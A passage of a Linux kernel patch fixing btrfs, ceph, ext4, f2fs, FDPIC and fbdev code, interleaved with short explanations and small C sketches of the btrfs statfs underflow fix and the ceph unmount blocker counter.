+@@ -2015,7 +2015,7 @@ config FB_COBALT
+ 
+ config FB_SH7760
+ 	bool "SH7760/SH7763/SH7720/SH7721 LCDC support"
+-	depends on FB && (CPU_SUBTYPE_SH7760 || CPU_SUBTYPE_SH7763 \
++	depends on FB=y && (CPU_SUBTYPE_SH7760 || CPU_SUBTYPE_SH7763 \
+ 		|| CPU_SUBTYPE_SH7720 || CPU_SUBTYPE_SH7721)
+ 	select FB_CFB_FILLRECT
+ 	select FB_CFB_COPYAREA
+diff --git a/fs/binfmt_elf_fdpic.c b/fs/binfmt_elf_fdpic.c
+index 069f12cc7634c..2aecd4ffb13b3 100644
+--- a/fs/binfmt_elf_fdpic.c
++++ b/fs/binfmt_elf_fdpic.c
+@@ -345,10 +345,9 @@ static int load_elf_fdpic_binary(struct linux_binprm *bprm)
+ 	/* there's now no turning back... the old userspace image is dead,
+ 	 * defunct, deceased, etc.
+ 	 */
++	SET_PERSONALITY(exec_params.hdr);
+ 	if (elf_check_fdpic(&exec_params.hdr))
+-		set_personality(PER_LINUX_FDPIC);
+-	else
+-		set_personality(PER_LINUX);
++		current->personality |= PER_LINUX_FDPIC;
+ 	if (elf_read_implies_exec(&exec_params.hdr, executable_stack))
+ 		current->personality |= READ_IMPLIES_EXEC;
+ 
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index d2cbb7733c7d6..1331e56e8e84f 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -407,6 +407,7 @@ static void finish_one_item(struct btrfs_delayed_root *delayed_root)
+ 
+ static void __btrfs_remove_delayed_item(struct btrfs_delayed_item *delayed_item)
+ {
++	struct btrfs_delayed_node *delayed_node = delayed_item->delayed_node;
+ 	struct rb_root_cached *root;
+ 	struct btrfs_delayed_root *delayed_root;
+ 
+@@ -414,18 +415,21 @@ static void __btrfs_remove_delayed_item(struct btrfs_delayed_item *delayed_item)
+ 	if (RB_EMPTY_NODE(&delayed_item->rb_node))
+ 		return;
+ 
+-	delayed_root = delayed_item->delayed_node->root->fs_info->delayed_root;
++	/* If it's in a rbtree, then we need to have delayed node locked. */
++	lockdep_assert_held(&delayed_node->mutex);
++
++	delayed_root = delayed_node->root->fs_info->delayed_root;
+ 
+ 	BUG_ON(!delayed_root);
+ 
+ 	if (delayed_item->type == BTRFS_DELAYED_INSERTION_ITEM)
+-		root = &delayed_item->delayed_node->ins_root;
++		root = &delayed_node->ins_root;
+ 	else
+-		root = &delayed_item->delayed_node->del_root;
++		root = &delayed_node->del_root;
+ 
+ 	rb_erase_cached(&delayed_item->rb_node, root);
+ 	RB_CLEAR_NODE(&delayed_item->rb_node);
+-	delayed_item->delayed_node->count--;
++	delayed_node->count--;
+ 
+ 	finish_one_item(delayed_root);
+ }
+@@ -1421,7 +1425,29 @@ void btrfs_balance_delayed_items(struct btrfs_fs_info *fs_info)
+ 	btrfs_wq_run_delayed_node(delayed_root, fs_info, BTRFS_DELAYED_BATCH);
+ }
+ 
+-/* Will return 0 or -ENOMEM */
++static void btrfs_release_dir_index_item_space(struct btrfs_trans_handle *trans)
++{
++	struct btrfs_fs_info *fs_info = trans->fs_info;
++	const u64 bytes = btrfs_calc_insert_metadata_size(fs_info, 1);
++
++	if (test_bit(BTRFS_FS_LOG_RECOVERING, &fs_info->flags))
++		return;
++
++	/*
++	 * Adding the new dir index item does not require touching another
++	 * leaf, so we can release 1 unit of metadata that was previously
++	 * reserved when starting the transaction. This applies only to
++	 * the case where we had a transaction start and excludes the
++	 * transaction join case (when replaying log trees).
++	 */
++	trace_btrfs_space_reservation(fs_info, "transaction",
++				      trans->transid, bytes, 0);
++	btrfs_block_rsv_release(fs_info, trans->block_rsv, bytes, NULL);
++	ASSERT(trans->bytes_reserved >= bytes);
++	trans->bytes_reserved -= bytes;
++}
++
++/* Will return 0, -ENOMEM or -EEXIST (index number collision, unexpected). */
+ int btrfs_insert_delayed_dir_index(struct btrfs_trans_handle *trans,
+ 				   const char *name, int name_len,
+ 				   struct btrfs_inode *dir,
+@@ -1463,6 +1489,27 @@ int btrfs_insert_delayed_dir_index(struct btrfs_trans_handle *trans,
+ 
+ 	mutex_lock(&delayed_node->mutex);
+ 
++	/*
++	 * First attempt to insert the delayed item. This is to make the error
++	 * handling path simpler in case we fail (-EEXIST). There's no risk of
++	 * any other task coming in and running the delayed item before we do
++	 * the metadata space reservation below, because we are holding the
++	 * delayed node's mutex and that mutex must also be locked before the
++	 * node's delayed items can be run.
++	 */
++	ret = __btrfs_add_delayed_item(delayed_node, delayed_item);
++	if (unlikely(ret)) {
++		btrfs_err(trans->fs_info,
++"error adding delayed dir index item, name: %.*s, index: %llu, root: %llu, dir: %llu, dir->index_cnt: %llu, delayed_node->index_cnt: %llu, error: %d",
++			  name_len, name, index, btrfs_root_id(delayed_node->root),
++			  delayed_node->inode_id, dir->index_cnt,
++			  delayed_node->index_cnt, ret);
++		btrfs_release_delayed_item(delayed_item);
++		btrfs_release_dir_index_item_space(trans);
++		mutex_unlock(&delayed_node->mutex);
++		goto release_node;
++	}
++
+ 	if (delayed_node->index_item_leaves == 0 ||
+ 	    delayed_node->curr_index_batch_size + data_len > leaf_data_size) {
+ 		delayed_node->curr_index_batch_size = data_len;
+@@ -1480,36 +1527,14 @@ int btrfs_insert_delayed_dir_index(struct btrfs_trans_handle *trans,
+ 		 * impossible.
+ 		 */
+ 		if (WARN_ON(ret)) {
+-			mutex_unlock(&delayed_node->mutex);
+ 			btrfs_release_delayed_item(delayed_item);
++			mutex_unlock(&delayed_node->mutex);
+ 			goto release_node;
+ 		}
+ 
+ 		delayed_node->index_item_leaves++;
+-	} else if (!test_bit(BTRFS_FS_LOG_RECOVERING, &fs_info->flags)) {
+-		const u64 bytes = btrfs_calc_insert_metadata_size(fs_info, 1);
+-
+-		/*
+-		 * Adding the new dir index item does not require touching another
+-		 * leaf, so we can release 1 unit of metadata that was previously
+-		 * reserved when starting the transaction. This applies only to
+-		 * the case where we had a transaction start and excludes the
+-		 * transaction join case (when replaying log trees).
+-		 */
+-		trace_btrfs_space_reservation(fs_info, "transaction",
+-					      trans->transid, bytes, 0);
+-		btrfs_block_rsv_release(fs_info, trans->block_rsv, bytes, NULL);
+-		ASSERT(trans->bytes_reserved >= bytes);
+-		trans->bytes_reserved -= bytes;
+-	}
+-
+-	ret = __btrfs_add_delayed_item(delayed_node, delayed_item);
+-	if (unlikely(ret)) {
+-		btrfs_err(trans->fs_info,
+-			  "err add delayed dir index item(name: %.*s) into the insertion tree of the delayed node(root id: %llu, inode id: %llu, errno: %d)",
+-			  name_len, name, delayed_node->root->root_key.objectid,
+-			  delayed_node->inode_id, ret);
+-		BUG();
++	} else {
++		btrfs_release_dir_index_item_space(trans);
+ 	}
+ 	mutex_unlock(&delayed_node->mutex);
+ 
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 0ad69041954ff..afcc96a1f4276 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -5184,8 +5184,14 @@ void read_extent_buffer(const struct extent_buffer *eb, void *dstv,
+ 	char *dst = (char *)dstv;
+ 	unsigned long i = get_eb_page_index(start);
+ 
+-	if (check_eb_range(eb, start, len))
++	if (check_eb_range(eb, start, len)) {
++		/*
++		 * Invalid range hit, reset the memory, so callers won't get
++		 * some random garbage for their uninitialized memory.
++		 */
++		memset(dstv, 0, len);
+ 		return;
++	}
+ 
+ 	offset = get_eb_offset_in_page(eb, start);
+ 
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 6438300fa2461..582b71b7fa779 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -2418,7 +2418,7 @@ static int btrfs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 	 * calculated f_bavail.
+ 	 */
+ 	if (!mixed && block_rsv->space_info->full &&
+-	    total_free_meta - thresh < block_rsv->size)
++	    (total_free_meta < thresh || total_free_meta - thresh < block_rsv->size))
+ 		buf->f_bavail = 0;
+ 
+ 	buf->f_type = BTRFS_SUPER_MAGIC;
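
The statfs fix guards an unsigned subtraction: when total_free_meta is smaller than thresh, total_free_meta - thresh wraps to a huge value and the f_bavail clamp never triggers. The failure mode is easy to reproduce:

#include <stdio.h>

typedef unsigned long long u64;

int main(void)
{
	u64 total_free_meta = 100, thresh = 200, rsv_size = 500;

	/* Buggy form: wraps to nearly 2^64 when total_free_meta < thresh,
	 * so the comparison is false and f_bavail is never zeroed. */
	int buggy = total_free_meta - thresh < rsv_size;

	/* Fixed form: handle the underflow case explicitly first. */
	int fixed = total_free_meta < thresh ||
		    total_free_meta - thresh < rsv_size;

	printf("buggy=%d fixed=%d (wrapped diff=%llu)\n",
	       buggy, fixed, total_free_meta - thresh);
	return 0;
}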
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 4a9ad5ff726d4..36052a3626830 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -4100,6 +4100,9 @@ void ceph_handle_caps(struct ceph_mds_session *session,
+ 
+ 	dout("handle_caps from mds%d\n", session->s_mds);
+ 
++	if (!ceph_inc_mds_stopping_blocker(mdsc, session))
++		return;
++
+ 	/* decode */
+ 	end = msg->front.iov_base + msg->front.iov_len;
+ 	if (msg->front.iov_len < sizeof(*h))
+@@ -4196,7 +4199,6 @@ void ceph_handle_caps(struct ceph_mds_session *session,
+ 	     vino.snap, inode);
+ 
+ 	mutex_lock(&session->s_mutex);
+-	inc_session_sequence(session);
+ 	dout(" mds%d seq %lld cap seq %u\n", session->s_mds, session->s_seq,
+ 	     (unsigned)seq);
+ 
+@@ -4299,6 +4301,8 @@ done:
+ done_unlocked:
+ 	iput(inode);
+ out:
++	ceph_dec_mds_stopping_blocker(mdsc);
++
+ 	ceph_put_string(extra_info.pool_ns);
+ 
+ 	/* Defer closing the sessions after s_mutex lock being released */
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 5399a9ea5b4f1..f6a7fd47efd7a 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -4546,6 +4546,9 @@ static void handle_lease(struct ceph_mds_client *mdsc,
+ 
+ 	dout("handle_lease from mds%d\n", mds);
+ 
++	if (!ceph_inc_mds_stopping_blocker(mdsc, session))
++		return;
++
+ 	/* decode */
+ 	if (msg->front.iov_len < sizeof(*h) + sizeof(u32))
+ 		goto bad;
+@@ -4564,8 +4567,6 @@ static void handle_lease(struct ceph_mds_client *mdsc,
+ 	     dname.len, dname.name);
+ 
+ 	mutex_lock(&session->s_mutex);
+-	inc_session_sequence(session);
+-
+ 	if (!inode) {
+ 		dout("handle_lease no inode %llx\n", vino.ino);
+ 		goto release;
+@@ -4627,9 +4628,13 @@ release:
+ out:
+ 	mutex_unlock(&session->s_mutex);
+ 	iput(inode);
++
++	ceph_dec_mds_stopping_blocker(mdsc);
+ 	return;
+ 
+ bad:
++	ceph_dec_mds_stopping_blocker(mdsc);
++
+ 	pr_err("corrupt lease message\n");
+ 	ceph_msg_dump(msg);
+ }
+@@ -4825,6 +4830,9 @@ int ceph_mdsc_init(struct ceph_fs_client *fsc)
+ 	}
+ 
+ 	init_completion(&mdsc->safe_umount_waiters);
++	spin_lock_init(&mdsc->stopping_lock);
++	atomic_set(&mdsc->stopping_blockers, 0);
++	init_completion(&mdsc->stopping_waiter);
+ 	init_waitqueue_head(&mdsc->session_close_wq);
+ 	INIT_LIST_HEAD(&mdsc->waiting_for_map);
+ 	mdsc->quotarealms_inodes = RB_ROOT;
+diff --git a/fs/ceph/mds_client.h b/fs/ceph/mds_client.h
+index 9a80658f41679..0913959ccfa64 100644
+--- a/fs/ceph/mds_client.h
++++ b/fs/ceph/mds_client.h
+@@ -381,8 +381,9 @@ struct cap_wait {
+ };
+ 
+ enum {
+-       CEPH_MDSC_STOPPING_BEGIN = 1,
+-       CEPH_MDSC_STOPPING_FLUSHED = 2,
++	CEPH_MDSC_STOPPING_BEGIN = 1,
++	CEPH_MDSC_STOPPING_FLUSHING = 2,
++	CEPH_MDSC_STOPPING_FLUSHED = 3,
+ };
+ 
+ /*
+@@ -401,7 +402,11 @@ struct ceph_mds_client {
+ 	struct ceph_mds_session **sessions;    /* NULL for mds if no session */
+ 	atomic_t		num_sessions;
+ 	int                     max_sessions;  /* len of sessions array */
+-	int                     stopping;      /* true if shutting down */
++
++	spinlock_t              stopping_lock;  /* protect stopping state */
++	int                     stopping;      /* the stage of shutting down */
++	atomic_t                stopping_blockers;
++	struct completion	stopping_waiter;
+ 
+ 	atomic64_t		quotarealms_count; /* # realms with quota */
+ 	/*
+diff --git a/fs/ceph/quota.c b/fs/ceph/quota.c
+index 64592adfe48fb..f7fcf7f08ec64 100644
+--- a/fs/ceph/quota.c
++++ b/fs/ceph/quota.c
+@@ -47,25 +47,23 @@ void ceph_handle_quota(struct ceph_mds_client *mdsc,
+ 	struct inode *inode;
+ 	struct ceph_inode_info *ci;
+ 
++	if (!ceph_inc_mds_stopping_blocker(mdsc, session))
++		return;
++
+ 	if (msg->front.iov_len < sizeof(*h)) {
+ 		pr_err("%s corrupt message mds%d len %d\n", __func__,
+ 		       session->s_mds, (int)msg->front.iov_len);
+ 		ceph_msg_dump(msg);
+-		return;
++		goto out;
+ 	}
+ 
+-	/* increment msg sequence number */
+-	mutex_lock(&session->s_mutex);
+-	inc_session_sequence(session);
+-	mutex_unlock(&session->s_mutex);
+-
+ 	/* lookup inode */
+ 	vino.ino = le64_to_cpu(h->ino);
+ 	vino.snap = CEPH_NOSNAP;
+ 	inode = ceph_find_inode(sb, vino);
+ 	if (!inode) {
+ 		pr_warn("Failed to find inode %llu\n", vino.ino);
+-		return;
++		goto out;
+ 	}
+ 	ci = ceph_inode(inode);
+ 
+@@ -78,6 +76,8 @@ void ceph_handle_quota(struct ceph_mds_client *mdsc,
+ 	spin_unlock(&ci->i_ceph_lock);
+ 
+ 	iput(inode);
++out:
++	ceph_dec_mds_stopping_blocker(mdsc);
+ }
+ 
+ static struct ceph_quotarealm_inode *
+diff --git a/fs/ceph/snap.c b/fs/ceph/snap.c
+index 2e73ba62bd7aa..82f7592e1747b 100644
+--- a/fs/ceph/snap.c
++++ b/fs/ceph/snap.c
+@@ -1012,6 +1012,9 @@ void ceph_handle_snap(struct ceph_mds_client *mdsc,
+ 	int locked_rwsem = 0;
+ 	bool close_sessions = false;
+ 
++	if (!ceph_inc_mds_stopping_blocker(mdsc, session))
++		return;
++
+ 	/* decode */
+ 	if (msg->front.iov_len < sizeof(*h))
+ 		goto bad;
+@@ -1027,10 +1030,6 @@ void ceph_handle_snap(struct ceph_mds_client *mdsc,
+ 	dout("%s from mds%d op %s split %llx tracelen %d\n", __func__,
+ 	     mds, ceph_snap_op_name(op), split, trace_len);
+ 
+-	mutex_lock(&session->s_mutex);
+-	inc_session_sequence(session);
+-	mutex_unlock(&session->s_mutex);
+-
+ 	down_write(&mdsc->snap_rwsem);
+ 	locked_rwsem = 1;
+ 
+@@ -1148,6 +1147,7 @@ skip_inode:
+ 	up_write(&mdsc->snap_rwsem);
+ 
+ 	flush_snaps(mdsc);
++	ceph_dec_mds_stopping_blocker(mdsc);
+ 	return;
+ 
+ bad:
+@@ -1157,6 +1157,8 @@ out:
+ 	if (locked_rwsem)
+ 		up_write(&mdsc->snap_rwsem);
+ 
++	ceph_dec_mds_stopping_blocker(mdsc);
++
+ 	if (close_sessions)
+ 		ceph_mdsc_close_sessions(mdsc);
+ 	return;
+diff --git a/fs/ceph/super.c b/fs/ceph/super.c
+index a5f52013314d6..281b493fdac8e 100644
+--- a/fs/ceph/super.c
++++ b/fs/ceph/super.c
+@@ -1365,25 +1365,90 @@ nomem:
+ 	return -ENOMEM;
+ }
+ 
++/*
++ * Return true if it successfully increases the blocker counter,
++ * or false if the mdsc is in stopping and flushed state.
++ */
++static bool __inc_stopping_blocker(struct ceph_mds_client *mdsc)
++{
++	spin_lock(&mdsc->stopping_lock);
++	if (mdsc->stopping >= CEPH_MDSC_STOPPING_FLUSHING) {
++		spin_unlock(&mdsc->stopping_lock);
++		return false;
++	}
++	atomic_inc(&mdsc->stopping_blockers);
++	spin_unlock(&mdsc->stopping_lock);
++	return true;
++}
++
++static void __dec_stopping_blocker(struct ceph_mds_client *mdsc)
++{
++	spin_lock(&mdsc->stopping_lock);
++	if (!atomic_dec_return(&mdsc->stopping_blockers) &&
++	    mdsc->stopping >= CEPH_MDSC_STOPPING_FLUSHING)
++		complete_all(&mdsc->stopping_waiter);
++	spin_unlock(&mdsc->stopping_lock);
++}
++
++/* For metadata IO requests */
++bool ceph_inc_mds_stopping_blocker(struct ceph_mds_client *mdsc,
++				   struct ceph_mds_session *session)
++{
++	mutex_lock(&session->s_mutex);
++	inc_session_sequence(session);
++	mutex_unlock(&session->s_mutex);
++
++	return __inc_stopping_blocker(mdsc);
++}
++
++void ceph_dec_mds_stopping_blocker(struct ceph_mds_client *mdsc)
++{
++	__dec_stopping_blocker(mdsc);
++}
++
+ static void ceph_kill_sb(struct super_block *s)
+ {
+ 	struct ceph_fs_client *fsc = ceph_sb_to_client(s);
++	struct ceph_mds_client *mdsc = fsc->mdsc;
++	bool wait;
+ 
+ 	dout("kill_sb %p\n", s);
+ 
+-	ceph_mdsc_pre_umount(fsc->mdsc);
++	ceph_mdsc_pre_umount(mdsc);
+ 	flush_fs_workqueues(fsc);
+ 
+ 	/*
+ 	 * Though the kill_anon_super() will finally trigger the
+-	 * sync_filesystem() anyway, we still need to do it here
+-	 * and then bump the stage of shutdown to stop the work
+-	 * queue as earlier as possible.
++	 * sync_filesystem() anyway, we still need to do it here and
++	 * then bump the stage of shutdown. This lets us drop any
++	 * further messages from the MDSs, which would otherwise
++	 * only bump the inodes' i_count reference counters and
++	 * no longer make sense.
++	 *
++	 * Without this, evicting the inodes may fail in
++	 * kill_anon_super(), which triggers a warning when the
++	 * fscrypt keyring is destroyed and can then lead to a
++	 * crash in the ceph module when iput() tries to evict
++	 * the inodes later.
+ 	 */
+ 	sync_filesystem(s);
+ 
+-	fsc->mdsc->stopping = CEPH_MDSC_STOPPING_FLUSHED;
++	spin_lock(&mdsc->stopping_lock);
++	mdsc->stopping = CEPH_MDSC_STOPPING_FLUSHING;
++	wait = !!atomic_read(&mdsc->stopping_blockers);
++	spin_unlock(&mdsc->stopping_lock);
++
++	if (wait && atomic_read(&mdsc->stopping_blockers)) {
++		long timeleft = wait_for_completion_killable_timeout(
++					&mdsc->stopping_waiter,
++					fsc->client->options->mount_timeout);
++		if (!timeleft) /* timed out */
++			pr_warn("umount timed out, %ld\n", timeleft);
++		else if (timeleft < 0) /* killed */
++			pr_warn("umount was killed, %ld\n", timeleft);
++	}
+ 
++	mdsc->stopping = CEPH_MDSC_STOPPING_FLUSHED;
+ 	kill_anon_super(s);
+ 
+ 	fsc->client->extra_mon_dispatch = NULL;
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 562f42f4a77d7..7ca74f5f70be5 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -1374,4 +1374,7 @@ extern bool ceph_quota_update_statfs(struct ceph_fs_client *fsc,
+ 				     struct kstatfs *buf);
+ extern void ceph_cleanup_quotarealms_inodes(struct ceph_mds_client *mdsc);
+ 
++bool ceph_inc_mds_stopping_blocker(struct ceph_mds_client *mdsc,
++			       struct ceph_mds_session *session);
++void ceph_dec_mds_stopping_blocker(struct ceph_mds_client *mdsc);
+ #endif /* _FS_CEPH_SUPER_H */
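
The ceph series adds a blocker count so unmount can wait for in-flight MDS message handlers: each handler increments the count on entry (failing once the mount has reached the FLUSHING stage, so the message is dropped) and the last decrement wakes the umount waiter. The counting logic, minus the spinlock and completion plumbing, as a single-threaded sketch:

#include <stdbool.h>
#include <stdio.h>

static int stopping;          /* 0 = running, 2 = flushing */
static int blockers;
static bool umount_woken;

static bool inc_blocker(void)
{
	if (stopping >= 2)    /* CEPH_MDSC_STOPPING_FLUSHING */
		return false; /* handler must drop the message */
	blockers++;
	return true;
}

static void dec_blocker(void)
{
	if (--blockers == 0 && stopping >= 2)
		umount_woken = true;  /* complete_all() in the kernel */
}

int main(void)
{
	inc_blocker();            /* a cap message is being handled */
	stopping = 2;             /* umount begins flushing */
	printf("late handler admitted? %d\n", inc_blocker());
	dec_blocker();            /* in-flight handler finishes */
	printf("umount woken? %d\n", umount_woken);
	return 0;
}

In the real code the check-and-increment runs under stopping_lock, and kill_sb waits on the completion with a mount_timeout bound rather than a flag.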
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 016925b1a0908..3c8300e08f412 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -16,6 +16,7 @@
+ #include <linux/slab.h>
+ #include <linux/nospec.h>
+ #include <linux/backing-dev.h>
++#include <linux/freezer.h>
+ #include <trace/events/ext4.h>
+ 
+ /*
+@@ -6420,6 +6421,21 @@ __acquires(bitlock)
+ 	return ret;
+ }
+ 
++static ext4_grpblk_t ext4_last_grp_cluster(struct super_block *sb,
++					   ext4_group_t grp)
++{
++	if (grp < ext4_get_groups_count(sb))
++		return EXT4_CLUSTERS_PER_GROUP(sb) - 1;
++	return (ext4_blocks_count(EXT4_SB(sb)->s_es) -
++		ext4_group_first_block_no(sb, grp) - 1) >>
++					EXT4_CLUSTER_BITS(sb);
++}
++
++static bool ext4_trim_interrupted(void)
++{
++	return fatal_signal_pending(current) || freezing(current);
++}
++
+ static int ext4_try_to_trim_range(struct super_block *sb,
+ 		struct ext4_buddy *e4b, ext4_grpblk_t start,
+ 		ext4_grpblk_t max, ext4_grpblk_t minblocks)
+@@ -6427,11 +6443,13 @@ __acquires(ext4_group_lock_ptr(sb, e4b->bd_group))
+ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ {
+ 	ext4_grpblk_t next, count, free_count;
++	bool set_trimmed = false;
+ 	void *bitmap;
+ 
+ 	bitmap = e4b->bd_bitmap;
+-	start = (e4b->bd_info->bb_first_free > start) ?
+-		e4b->bd_info->bb_first_free : start;
++	if (start == 0 && max >= ext4_last_grp_cluster(sb, e4b->bd_group))
++		set_trimmed = true;
++	start = max(e4b->bd_info->bb_first_free, start);
+ 	count = 0;
+ 	free_count = 0;
+ 
+@@ -6445,16 +6463,14 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ 			int ret = ext4_trim_extent(sb, start, next - start, e4b);
+ 
+ 			if (ret && ret != -EOPNOTSUPP)
+-				break;
++				return count;
+ 			count += next - start;
+ 		}
+ 		free_count += next - start;
+ 		start = next + 1;
+ 
+-		if (fatal_signal_pending(current)) {
+-			count = -ERESTARTSYS;
+-			break;
+-		}
++		if (ext4_trim_interrupted())
++			return count;
+ 
+ 		if (need_resched()) {
+ 			ext4_unlock_group(sb, e4b->bd_group);
+@@ -6466,6 +6482,9 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ 			break;
+ 	}
+ 
++	if (set_trimmed)
++		EXT4_MB_GRP_SET_TRIMMED(e4b->bd_info);
++
+ 	return count;
+ }
+ 
+@@ -6476,7 +6495,6 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+  * @start:		first group block to examine
+  * @max:		last group block to examine
+  * @minblocks:		minimum extent block count
+- * @set_trimmed:	set the trimmed flag if at least one block is trimmed
+  *
+  * ext4_trim_all_free walks through group's block bitmap searching for free
+  * extents. When the free extent is found, mark it as used in group buddy
+@@ -6486,7 +6504,7 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ static ext4_grpblk_t
+ ext4_trim_all_free(struct super_block *sb, ext4_group_t group,
+ 		   ext4_grpblk_t start, ext4_grpblk_t max,
+-		   ext4_grpblk_t minblocks, bool set_trimmed)
++		   ext4_grpblk_t minblocks)
+ {
+ 	struct ext4_buddy e4b;
+ 	int ret;
+@@ -6503,13 +6521,10 @@ ext4_trim_all_free(struct super_block *sb, ext4_group_t group,
+ 	ext4_lock_group(sb, group);
+ 
+ 	if (!EXT4_MB_GRP_WAS_TRIMMED(e4b.bd_info) ||
+-	    minblocks < EXT4_SB(sb)->s_last_trim_minblks) {
++	    minblocks < EXT4_SB(sb)->s_last_trim_minblks)
+ 		ret = ext4_try_to_trim_range(sb, &e4b, start, max, minblocks);
+-		if (ret >= 0 && set_trimmed)
+-			EXT4_MB_GRP_SET_TRIMMED(e4b.bd_info);
+-	} else {
++	else
+ 		ret = 0;
+-	}
+ 
+ 	ext4_unlock_group(sb, group);
+ 	ext4_mb_unload_buddy(&e4b);
+@@ -6542,7 +6557,6 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 	ext4_fsblk_t first_data_blk =
+ 			le32_to_cpu(EXT4_SB(sb)->s_es->s_first_data_block);
+ 	ext4_fsblk_t max_blks = ext4_blocks_count(EXT4_SB(sb)->s_es);
+-	bool whole_group, eof = false;
+ 	int ret = 0;
+ 
+ 	start = range->start >> sb->s_blocksize_bits;
+@@ -6561,10 +6575,8 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 		if (minlen > EXT4_CLUSTERS_PER_GROUP(sb))
+ 			goto out;
+ 	}
+-	if (end >= max_blks - 1) {
++	if (end >= max_blks - 1)
+ 		end = max_blks - 1;
+-		eof = true;
+-	}
+ 	if (end <= first_data_blk)
+ 		goto out;
+ 	if (start < first_data_blk)
+@@ -6578,9 +6590,10 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 
+ 	/* end now represents the last cluster to discard in this group */
+ 	end = EXT4_CLUSTERS_PER_GROUP(sb) - 1;
+-	whole_group = true;
+ 
+ 	for (group = first_group; group <= last_group; group++) {
++		if (ext4_trim_interrupted())
++			break;
+ 		grp = ext4_get_group_info(sb, group);
+ 		if (!grp)
+ 			continue;
+@@ -6597,13 +6610,11 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 		 * change it for the last group, note that last_cluster is
+ 		 * already computed earlier by ext4_get_group_no_and_offset()
+ 		 */
+-		if (group == last_group) {
++		if (group == last_group)
+ 			end = last_cluster;
+-			whole_group = eof ? true : end == EXT4_CLUSTERS_PER_GROUP(sb) - 1;
+-		}
+ 		if (grp->bb_free >= minlen) {
+ 			cnt = ext4_trim_all_free(sb, group, first_cluster,
+-						 end, minlen, whole_group);
++						 end, minlen);
+ 			if (cnt < 0) {
+ 				ret = cnt;
+ 				break;
+@@ -6648,8 +6659,7 @@ ext4_mballoc_query_range(
+ 
+ 	ext4_lock_group(sb, group);
+ 
+-	start = (e4b.bd_info->bb_first_free > start) ?
+-		e4b.bd_info->bb_first_free : start;
++	start = max(e4b.bd_info->bb_first_free, start);
+ 	if (end >= EXT4_CLUSTERS_PER_GROUP(sb))
+ 		end = EXT4_CLUSTERS_PER_GROUP(sb) - 1;
+ 
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index c230824ab5e6e..a982f91b71eb2 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -1212,7 +1212,8 @@ int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index)
+ }
+ 
+ struct page *f2fs_get_read_data_page(struct inode *inode, pgoff_t index,
+-				     blk_opf_t op_flags, bool for_write)
++				     blk_opf_t op_flags, bool for_write,
++				     pgoff_t *next_pgofs)
+ {
+ 	struct address_space *mapping = inode->i_mapping;
+ 	struct dnode_of_data dn;
+@@ -1238,12 +1239,17 @@ struct page *f2fs_get_read_data_page(struct inode *inode, pgoff_t index,
+ 
+ 	set_new_dnode(&dn, inode, NULL, NULL, 0);
+ 	err = f2fs_get_dnode_of_data(&dn, index, LOOKUP_NODE);
+-	if (err)
++	if (err) {
++		if (err == -ENOENT && next_pgofs)
++			*next_pgofs = f2fs_get_next_page_offset(&dn, index);
+ 		goto put_err;
++	}
+ 	f2fs_put_dnode(&dn);
+ 
+ 	if (unlikely(dn.data_blkaddr == NULL_ADDR)) {
+ 		err = -ENOENT;
++		if (next_pgofs)
++			*next_pgofs = index + 1;
+ 		goto put_err;
+ 	}
+ 	if (dn.data_blkaddr != NEW_ADDR &&
+@@ -1287,7 +1293,8 @@ put_err:
+ 	return ERR_PTR(err);
+ }
+ 
+-struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index)
++struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index,
++					pgoff_t *next_pgofs)
+ {
+ 	struct address_space *mapping = inode->i_mapping;
+ 	struct page *page;
+@@ -1297,7 +1304,7 @@ struct page *f2fs_find_data_page(struct inode *inode, pgoff_t index)
+ 		return page;
+ 	f2fs_put_page(page, 0);
+ 
+-	page = f2fs_get_read_data_page(inode, index, 0, false);
++	page = f2fs_get_read_data_page(inode, index, 0, false, next_pgofs);
+ 	if (IS_ERR(page))
+ 		return page;
+ 
+@@ -1322,18 +1329,14 @@ struct page *f2fs_get_lock_data_page(struct inode *inode, pgoff_t index,
+ {
+ 	struct address_space *mapping = inode->i_mapping;
+ 	struct page *page;
+-repeat:
+-	page = f2fs_get_read_data_page(inode, index, 0, for_write);
++
++	page = f2fs_get_read_data_page(inode, index, 0, for_write, NULL);
+ 	if (IS_ERR(page))
+ 		return page;
+ 
+ 	/* wait for read completion */
+ 	lock_page(page);
+-	if (unlikely(page->mapping != mapping)) {
+-		f2fs_put_page(page, 1);
+-		goto repeat;
+-	}
+-	if (unlikely(!PageUptodate(page))) {
++	if (unlikely(page->mapping != mapping || !PageUptodate(page))) {
+ 		f2fs_put_page(page, 1);
+ 		return ERR_PTR(-EIO);
+ 	}
+diff --git a/fs/f2fs/dir.c b/fs/f2fs/dir.c
+index bf5ba75b75d24..8373eba3a1337 100644
